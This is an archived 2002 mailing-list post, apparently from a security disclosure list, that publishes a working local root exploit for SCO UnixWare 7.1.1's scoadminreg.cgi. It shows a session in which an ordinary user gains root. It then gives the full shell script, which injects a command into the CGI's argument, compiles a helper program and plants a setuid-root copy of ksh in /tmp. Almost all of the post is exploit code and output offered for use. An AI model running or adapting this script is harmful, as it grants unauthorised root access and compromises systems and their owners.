|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: jGgM. (jggm
mail.com)Date: Sun Jan 20 2002 - 17:30:16 CST
('binary' encoding is not supported, stored as-is)
unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO
UNIX_SVR5
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./scoadminreg.sh
jGgM root exploit
http://www.netemperor.com/
Mail: jggmmail.com
Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated
with -c /tmp/jggm
ERROR: Could not add object ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminre
gError.html
Success...
# id
uid=101(mearee) gid=1(other) euid=0(root)
#
It can remote attack...maybe... :))
-----------------------------------------------
Korean Security Forum.
http://www.forsecure.com
http://www.netemperor.com
-----------------------------------------------
Here is file...
--------------------------------------------------------------
#!/bin/sh
CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi
#
#
#
#
echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: jggmmail.com"
echo
if [ ! -x $SCOADMIN ]; then
echo "$SCOADMIN file not found"
exit 2;
fi
cat >/tmp/jggm.c <<_EOF
main()
{
setuid(0);
setgid(0);
chown("/tmp/jGgM_Shell", 0, 0);
chmod("/tmp/jGgM_Shell", 04755);
}
_EOF
cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c
$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"
rm -rf /tmp/jggm /tmp/jggm.c
/tmp/jGgM_Shell
# end of file..
-----------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]